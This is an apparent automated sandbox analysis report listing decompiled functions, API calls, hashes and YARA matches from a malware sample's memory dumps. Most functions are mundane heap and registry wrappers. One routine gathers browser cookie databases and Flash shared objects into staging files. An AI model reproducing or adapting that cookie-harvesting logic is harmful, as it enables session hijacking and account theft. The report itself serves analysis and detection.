Part of subcall function 02771650: memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 027716EE

RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,02778A8E), ref: 027772C1

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heapmemcpy$Allocate$Freelstrlen
String ID:
API String ID: 4098479933-0
Opcode ID: 8b3d96367f4e633a5d3b38e2c50a50bfb7b82171d3c5a732eca42d113a1225cf
Instruction ID: b869609037710899cca8765d65b538a6ecbe7f09d1f0382524e70a0fb96121d3
Opcode Fuzzy Hash: 8b3d96367f4e633a5d3b38e2c50a50bfb7b82171d3c5a732eca42d113a1225cf
Instruction Fuzzy Hash: 6A01D136200205FFCF26CF04CC04FABBBB9EB64344F108029FA5996160E770EA54DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0540F64E, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0540B29E: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0542E098,00000000,0540F655,?,05402498,?), ref: 0540B2BD
Part of subcall function 0540B29E: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0542E098,00000000,0540F655,?,05402498,?), ref: 0540B2C8
Part of subcall function 0540B29E: _wcsupr.NTDLL ref: 0540B2D5
Part of subcall function 0540B29E: lstrlenW.KERNEL32(00000000), ref: 0540B2DD

ResumeThread.KERNEL32(00000004,?,05402498,?), ref: 0540F663

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
String ID:
API String ID: 3646851950-0
Opcode ID: f17c06c3ac4ed7f230d19ccdae4823917f62a5528f8f9a8cae8d79a004ce5f5c
Instruction ID: 002d36bd0fbfc68a873fde43aa3742cb9b279d0720cc5bb38712997f8fc3e21b
Opcode Fuzzy Hash: f17c06c3ac4ed7f230d19ccdae4823917f62a5528f8f9a8cae8d79a004ce5f5c
Instruction Fuzzy Hash: E4D05E30204720B6D6316A228E0EFAA7E92AF40B40F20DC3AF988421B0D771C825E509

Uniqueness

Uniqueness Score: -1.00%

Function 054203DD, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 229411d492d12e61e820cce3e6b335f25a566f4e17661eff91685de3a308bd68
Instruction ID: 74861b63b8ab038aefb1821949a8e6c3f589934c6f6323df8200583d846b211a
Opcode Fuzzy Hash: 229411d492d12e61e820cce3e6b335f25a566f4e17661eff91685de3a308bd68
Instruction Fuzzy Hash: F9B01271914210ABCA254B10EE06F497F31A750700F428010B308400A48A310421EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 02774C31, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02774C31(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x277d1f0, 0, _a4); // executed
				return _t2;
			}

0x02774c3d
0x02774c43

APIs

RtlFreeHeap.NTDLL(00000000,00000000,02775130,00000000,?,?,00000000,?,?,?,?,?,?,02778792,00000000), ref: 02774C3D

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a2f56038e58a85b81eefa48c8bdb9f6289a262e07566954068b6d108904db01d
Instruction ID: 3196bd9074d245364518188ef7e1d2e7458b0b343d5be4f1e78d0f5d75888afe
Opcode Fuzzy Hash: a2f56038e58a85b81eefa48c8bdb9f6289a262e07566954068b6d108904db01d
Instruction Fuzzy Hash: 27B01231880100EBCA224B00DD04F09BB21BB58704F21CC15B3401006083310434FB44

Uniqueness

Uniqueness Score: -1.00%

Function 027775C4, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E027775C4(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x277d1f0, 0, _a4); // executed
				return _t2;
			}

0x027775d0
0x027775d6

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 166f56e60b3301fc96b993d306a090398eb0b290722ed7178cfa7d54f70c6599
Instruction ID: a87c6871ed6b96801c211d9f242b26105e619553a2d7272f46c50a2c5aa8a8e5
Opcode Fuzzy Hash: 166f56e60b3301fc96b993d306a090398eb0b290722ed7178cfa7d54f70c6599
Instruction Fuzzy Hash: 19B01231C80100EBDA124B10DD04F057B21BB5C700F01C815F30010064C3310434EB54

Uniqueness

Uniqueness Score: -1.00%

Function 027781E9, Relevance: 1.3, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E027781E9(void* __eax, void* __ecx, void* __edx, void* _a4, void** _a8, intOrPtr* _a12) {
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				int _v40;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				char _v72;
				void* _t40;
				void* _t45;
				void* _t54;
				void* _t56;
				int _t59;
				void* _t60;
				void* _t62;
				void* _t63;

				_t57 = __ecx;
				_t56 = _a4;
				_t59 = 0;
				_t60 = __eax;
				_v16 = 0;
				_v12 = 0;
				_a4 = 0;
				if(__eax <= 0x40) {
					L20:
					return _t59;
				}
				_t6 = _t60 - 0x40; // 0x2773862
				_t40 = E0277A089(_a12, __ecx, __edx,  &_v72,  &_v16, _t56 + _t6);
				if(_t40 != 0) {
					goto L20;
				}
				_t61 = _t60 - 0x40;
				if(_v40 > _t60 - 0x40) {
					goto L20;
				}
				while( *((char*)(_t63 + _t40 - 0x34)) == 0) {
					_t40 = _t40 + 1;
					if(_t40 < 0x10) {
						continue;
					}
					_t59 = _v40;
					_t54 = E027775C4(_t59);
					_t71 = _t54;
					_a4 = _t54;
					if(_t54 != 0) {
						_t59 = 0;
						L17:
						if(_t59 != 0) {
							goto L20;
						}
						L18:
						if(_a4 != 0) {
							E02774C31(_a4);
						}
						goto L20;
					}
					memcpy(_t54, _t56, _t59);
					L7:
					_t62 = _a4;
					E02776D45(_t57, _t71, _t62, _t59,  &_v32);
					if(_v32 != _v72 || _v28 != _v68 || _v24 != _v64 || _v20 != _v60) {
						L14:
						_t59 = 0;
						goto L18;
					} else {
						 *_a8 = _t62;
						goto L17;
					}
				}
				_t45 = E0277A83A(_t61, _t56,  &_a4,  &_v12,  &_v56, 0); // executed
				__eflags = _t45;
				if(_t45 != 0) {
					_t59 = _v12;
					goto L17;
				}
				_t59 = _v40;
				__eflags = _v12 - _t59;
				if(__eflags >= 0) {
					goto L7;
				}
				goto L14;
			}

0x027781e9
0x027781f0
0x027781f5
0x027781f7
0x027781fc
0x027781ff
0x02778202
0x02778205
0x027782d0
0x027782d6
0x027782d6
0x0277820b
0x0277821b
0x02778222
0x00000000
0x00000000
0x02778228
0x0277822e
0x00000000
0x00000000
0x02778234
0x0277823b
0x0277823f
0x00000000
0x00000000
0x02778241
0x02778245
0x0277824a
0x0277824c
0x0277824f
0x027782b7
0x027782be
0x027782c0
0x00000000
0x00000000
0x027782c2
0x027782c6
0x027782cb
0x027782cb
0x00000000
0x027782c6
0x02778254
0x0277825c
0x0277825c
0x02778265
0x02778270
0x027782b3
0x027782b3
0x00000000
0x0277828a
0x0277828d
0x00000000
0x0277828d
0x02778270
0x027782a2
0x027782a7
0x027782a9
0x027782bb
0x00000000
0x027782bb
0x027782ab
0x027782ae
0x027782b1
0x00000000
0x00000000
0x00000000

APIs

memcpy.NTDLL(00000000,027738A2,02777BE6,02777BE6,?,027738A2,02773862,027738A2,?,027738A2), ref: 02778254

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 0b4e236784037021541fb1e411d7099dd7a81a41d8dd6343a7fe4c299d759969
Instruction ID: e57d02401dc2b9022d0763dfbac954322e5d4ef9f73513a7b3f0af48973398e2
Opcode Fuzzy Hash: 0b4e236784037021541fb1e411d7099dd7a81a41d8dd6343a7fe4c299d759969
Instruction Fuzzy Hash: A1314D72D01908ABDF12DF95C988AEFBBBDEF59351F104065E805E7210E730AE41DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02774195, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02774195(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E02773160(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E027751C4(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0x277d1f0, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x0277419d
0x027741f2
0x027741f7
0x0277419f
0x027741b9
0x027741bd
0x027741c2
0x027741c4
0x027741d4
0x027741e0
0x027741c6
0x027741c6
0x027741c9
0x027741ce
0x027741ce
0x027741c4
0x027741bd
0x027741fd

APIs

Part of subcall function 027751C4: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,0277A449,3D0277C0,80000002,0277544E,00000000,0277544E,?,65696C43,80000002), ref: 02775206
Part of subcall function 027751C4: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,0277A449,3D0277C0,80000002,0277544E,00000000,0277544E,?,65696C43), ref: 0277522B
Part of subcall function 027751C4: RegCloseKey.ADVAPI32(80000002,?,0277A449,3D0277C0,80000002,0277544E,00000000,0277544E,?,65696C43,80000002,00000000,?), ref: 0277525B

HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,02774C83,?,004F0053,04F39328,00000000,?), ref: 027741E0

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: QueryValue$CloseFreeHeap
String ID:
API String ID: 2109406458-0
Opcode ID: 4c24f3660ee3a787bcc483dc0693ef3c9bec2af52a98dfa9e63402f994523cf9
Instruction ID: 98efa45d5e7ae57559f41c2d214cdfa53b51f9e226a225e37ea333bd528810f1
Opcode Fuzzy Hash: 4c24f3660ee3a787bcc483dc0693ef3c9bec2af52a98dfa9e63402f994523cf9
Instruction Fuzzy Hash: A001F636140249EBCF22AF44CC15FAA3BB6FB94351F158829FA19AA150DB319535DB50

Uniqueness

Uniqueness Score: -1.00%

Function 027713AD, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E027713AD(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x027713ad
0x027713ba
0x027713bb
0x027713bc
0x027713c3
0x027713f1
0x027713f2
0x027713f5
0x027713fb
0x00000000
0x00000000
0x027713da
0x027713e4
0x027713eb
0x00000000
0x027713dc
0x027713df
0x027713ff
0x027713e1
0x027713e1
0x00000000
0x027713e1
0x027713df
0x02771406
0x0277140c
0x0277140c
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 027713F5

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 4f631227f116b2045afe76d37662af21be3cf46bd94936e90da93cf190a0c0d6
Instruction ID: 0cb56fa5e5dc44f82cd7fd4f7881f37afa03920ea0c57a08af07a70c365c665a
Opcode Fuzzy Hash: 4f631227f116b2045afe76d37662af21be3cf46bd94936e90da93cf190a0c0d6
Instruction Fuzzy Hash: 31F0E775D11218EFDF00DBD9D588AEDB7B8FF08249F5080AAE506A7240D3B46B84CB51

Uniqueness

Uniqueness Score: -1.00%

Function 027774F4, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E027774F4(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E02777B54(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E02774C31(_a4);
				}
				return _t13;
			}

0x02777500
0x02777505
0x02777509
0x02777510
0x0277751b
0x0277751f
0x0277751f
0x02777528

APIs

Part of subcall function 02777B54: memcpy.NTDLL(00000000,00000090,027738A2,027738A2,?,?,027738A2,?,?,0277819E,?), ref: 02777B8A
Part of subcall function 02777B54: memset.NTDLL ref: 02777BFF
Part of subcall function 02777B54: memset.NTDLL ref: 02777C13

memcpy.NTDLL(027738A2,027738A2,00000000,027738A2,027738A2,027738A2,?,?,0277819E,?,?,027738A2,?), ref: 02777510

Part of subcall function 02774C31: RtlFreeHeap.NTDLL(00000000,00000000,02775130,00000000,?,?,00000000,?,?,?,?,?,?,02778792,00000000), ref: 02774C3D

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: b513ea67cf98115dce7cee0d64ca3f08bf932c0a0fb250f4e76961dc4aa8a12c
Instruction ID: d31f075557167fd53abb066aa5888e95faa66c325882d4e0b39bab5caa53f8a9
Opcode Fuzzy Hash: b513ea67cf98115dce7cee0d64ca3f08bf932c0a0fb250f4e76961dc4aa8a12c
Instruction Fuzzy Hash: AEE08C725022287ACF132B94DC00DEFBF6DCF46791F004024FE088A200D631CA10ABE2

Uniqueness

Uniqueness Score: -1.00%

Function 0541DF0E, Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0541DF18

Part of subcall function 0541F3A6: RegOpenKeyExA.KERNELBASE(0541DF30,00000000,00000000,00020119,80000001,00000000,Software\AppDataLow\Software\Microsoft\,00000000,?,0542E140,0541DF30,0542137E,80000001,?,0542137E), ref: 0541F3DF
Part of subcall function 0541F3A6: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,?,0542137E,?,?,?,?,?,?,?,?,0540202D), ref: 0541F3F3
Part of subcall function 0541F3A6: RegCloseKey.KERNELBASE(?,?,Client32,?,?,?,0542137E,?,?,?,?,?,?,?,?,0540202D), ref: 0541F43C

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: 256b34b9c36e5d4b68d9d53c69061f83dcbfb307b41c0e2a68cb1003ac568edf
Instruction ID: 577da0842a4ab19cb246cf5bb7bb0b77e35638400c6ef24d278fa07d3c77a1d4
Opcode Fuzzy Hash: 256b34b9c36e5d4b68d9d53c69061f83dcbfb307b41c0e2a68cb1003ac568edf
Instruction Fuzzy Hash: 25E0E23024010CBBDF20AA16CC05FD93B56AB50350F008026FE08A9261D7729A69A7A8

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 054222F7, Relevance: 58.0, APIs: 16, Strings: 17, Instructions: 226memorystringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(%APPDATA%,0542720A,00000000,?,00000000), ref: 0542230F

Part of subcall function 05415518: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 05415564
Part of subcall function 05415518: lstrlenW.KERNEL32(?,?,77A31120), ref: 05415570
Part of subcall function 05415518: memset.NTDLL ref: 054155B8
Part of subcall function 05415518: FindFirstFileW.KERNEL32(00000000,00000000), ref: 054155D3
Part of subcall function 05415518: lstrlenW.KERNEL32(0000002C), ref: 0541560B
Part of subcall function 05415518: lstrlenW.KERNEL32(?), ref: 05415613
Part of subcall function 05415518: memset.NTDLL ref: 05415636
Part of subcall function 05415518: wcscpy.NTDLL ref: 05415648

Part of subcall function 05415518: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0541566E
Part of subcall function 05415518: RtlEnterCriticalSection.NTDLL(?), ref: 054156A3
Part of subcall function 05415518: RtlLeaveCriticalSection.NTDLL(?), ref: 054156BF
Part of subcall function 05415518: FindNextFileW.KERNEL32(?,00000000), ref: 054156D8
Part of subcall function 05415518: WaitForSingleObject.KERNEL32(00000000), ref: 054156EA
Part of subcall function 05415518: FindClose.KERNEL32(?), ref: 054156FF
Part of subcall function 05415518: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05415713
Part of subcall function 05415518: lstrlenW.KERNEL32(0000002C), ref: 05415735

RtlAllocateHeap.NTDLL(00000000,00000036,%APPDATA%\Mozilla\Firefox\Profiles), ref: 05422356
memcpy.NTDLL(00000000,%APPDATA%,00000000,?,00000000), ref: 0542236B
lstrcpyW.KERNEL32(00000000,\Macromedia\Flash Player\), ref: 0542237B

Part of subcall function 05415518: FindNextFileW.KERNEL32(?,00000000), ref: 054157AB
Part of subcall function 05415518: WaitForSingleObject.KERNEL32(00000000), ref: 054157BD
Part of subcall function 05415518: FindClose.KERNEL32(?), ref: 054157D8

HeapFree.KERNEL32(00000000,00000000,00000000,*.sol,?,00000000,00000000,00000010,?,?,00000000), ref: 0542239F
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 054223B7
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05422403
lstrlenW.KERNEL32(00000000,%userprofile%\AppData\Local\,?,00000000), ref: 05422422
RtlAllocateHeap.NTDLL(00000000,?), ref: 05422434
HeapFree.KERNEL32(00000000,00000000,00000000,cookies,?,00000000,00000000,00000014,?,00000000), ref: 0542248B
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0542249D
CreateDirectoryW.KERNEL32(00000000,00000000,%userprofile%\AppData\Local\,?,00000000), ref: 054224C4
lstrlenW.KERNEL32(\cookie.ie,%userprofile%\AppData\Local\,?,00000000), ref: 0542250A
DeleteFileW.KERNEL32(?,%userprofile%\AppData\Local\,?,00000000), ref: 05422533
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 05422541
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 05422564

Strings

\cookie.cr, xrefs: 054224F6
%APPDATA%, xrefs: 05422302, 05422365
\cookie.ie, xrefs: 05422504
*.cookie, xrefs: 054223EE
Google\Chrome\User Data\Default, xrefs: 0542243C
*.txt, xrefs: 054223D8
cookies, xrefs: 05422454, 05422476
cookies.sqlite, xrefs: 05422322
Microsoft\Edge\User Data\Default, xrefs: 0542245F
\cookie.ff, xrefs: 054224FD, 05422509
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 05422327, 0542232C, 05422342
*.sol, xrefs: 0542238A
%userprofile%\AppData\Local\, xrefs: 05422409
\cookie.ed, xrefs: 054224EF
\sols, xrefs: 05422512
cookies.sqlite-journal, xrefs: 0542233D
\Macromedia\Flash Player\, xrefs: 05422373

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$lstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymemcpywcscpy
String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$%userprofile%\AppData\Local\$*.cookie$*.sol$*.txt$Google\Chrome\User Data\Default$Microsoft\Edge\User Data\Default$\Macromedia\Flash Player\$\cookie.cr$\cookie.ed$\cookie.ff$\cookie.ie$\sols$cookies$cookies.sqlite$cookies.sqlite-journal
API String ID: 659829602-1887243743
Opcode ID: 4c210f96b572d791712c9b18ff007f8451ee61f9ea63d32ad01afe12d3b7e8ca
Instruction ID: e02fd929d535d4d30cc6cd650cda43b2cd7f3de0ad135386b16490f7dac18292
Opcode Fuzzy Hash: 4c210f96b572d791712c9b18ff007f8451ee61f9ea63d32ad01afe12d3b7e8ca
Instruction Fuzzy Hash: A5610571548334BFC230AB659C8ACEB7FBDEB89B44BC0451BFA01E2101EAB09945DB75

Uniqueness

Uniqueness Score: -1.00%

Function 0540834C, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 224memoryfiletimeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,.dll), ref: 0540837A
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 0540839D
memset.NTDLL ref: 054083B8

Part of subcall function 05404F1D: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,054083D1,73797325), ref: 05404F2E
Part of subcall function 05404F1D: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 05404F48

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 054083F9
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 0540840F
CloseHandle.KERNEL32(?), ref: 05408429
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 05408436
lstrcat.KERNEL32(?,642E2A5C), ref: 0540847B
FindFirstFileA.KERNEL32(?,?), ref: 05408490
CompareFileTime.KERNEL32(?,?), ref: 054084AE
FindNextFileA.KERNEL32(?,?), ref: 054084C1
FindClose.KERNEL32(?), ref: 054084CF
FindFirstFileA.KERNEL32(?,?), ref: 054084DA
CompareFileTime.KERNEL32(?,?), ref: 054084FA
StrChrA.SHLWAPI(?,0000002E), ref: 05408532
memcpy.NTDLL(?,?,00000000), ref: 05408568
FindNextFileA.KERNEL32(?,?), ref: 0540857D
FindClose.KERNEL32(?), ref: 0540858B
FindFirstFileA.KERNEL32(?,?), ref: 05408596
CompareFileTime.KERNEL32(?,?), ref: 054085A6
FindClose.KERNEL32(?), ref: 054085DF
HeapFree.KERNEL32(00000000,?,73797325), ref: 054085F2
HeapFree.KERNEL32(00000000,?), ref: 05408603

Strings

.dll, xrefs: 05408365

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID: .dll
API String ID: 455834338-2738580789
Opcode ID: 71a0688aad3d54dc3706f66af8425ae929e19693e0fbcab8d8b95b724e63eb41
Instruction ID: e912ea4f500276b9b97f797c4f6b2eab0d9ca9cc1c1cc497994528e19c445958
Opcode Fuzzy Hash: 71a0688aad3d54dc3706f66af8425ae929e19693e0fbcab8d8b95b724e63eb41
Instruction Fuzzy Hash: E8815671518311AFD724DF25DD85EABBBE9FB88340F50092EF585D2290EB30D909CB66

Uniqueness

Uniqueness Score: -1.00%

Function 05415518, Relevance: 28.7, APIs: 19, Instructions: 233stringfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

Part of subcall function 054176F8: ExpandEnvironmentStringsW.KERNEL32(054120A2,00000000,00000000,00000001,00000000,00000000,?,054120A2,00000000,?,?,00000000), ref: 0541770F
Part of subcall function 054176F8: ExpandEnvironmentStringsW.KERNEL32(054120A2,00000000,00000000,00000000), ref: 05417729

lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 05415564
lstrlenW.KERNEL32(?,?,77A31120), ref: 05415570
memset.NTDLL ref: 054155B8
FindFirstFileW.KERNEL32(00000000,00000000), ref: 054155D3
lstrlenW.KERNEL32(0000002C), ref: 0541560B
lstrlenW.KERNEL32(?), ref: 05415613
memset.NTDLL ref: 05415636
wcscpy.NTDLL ref: 05415648
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0541566E
RtlEnterCriticalSection.NTDLL(?), ref: 054156A3

Part of subcall function 05408AC2: HeapFree.KERNEL32(00000000,00000000,05421258,00000000), ref: 05408ACE

RtlLeaveCriticalSection.NTDLL(?), ref: 054156BF
FindNextFileW.KERNEL32(?,00000000), ref: 054156D8
WaitForSingleObject.KERNEL32(00000000), ref: 054156EA
FindClose.KERNEL32(?), ref: 054156FF
FindFirstFileW.KERNEL32(00000000,00000000), ref: 05415713
lstrlenW.KERNEL32(0000002C), ref: 05415735
FindNextFileW.KERNEL32(?,00000000), ref: 054157AB
WaitForSingleObject.KERNEL32(00000000), ref: 054157BD
FindClose.KERNEL32(?), ref: 054157D8

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID:
API String ID: 2962561936-0
Opcode ID: 69b9b9cd429d29127961b74de3c4a8e73e2aec9929856482aed13e3739c03645
Instruction ID: ec2410a17fe45b13b6e53c8926301de743bb05994af22a492ab4c6cf27034470
Opcode Fuzzy Hash: 69b9b9cd429d29127961b74de3c4a8e73e2aec9929856482aed13e3739c03645
Instruction Fuzzy Hash: 15816871608315AFC720AF25CC89BDBBBE9FF84300F54486AF89A96251DB74D8058F66

Uniqueness

Uniqueness Score: -1.00%

Function 05412678, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 387memoryCOMMON

Download Yara Rule

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 054126AE
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,75144D40,?,?,0540672C,00000000,00000000,00000000,0540CEBC,?,?), ref: 054126E0
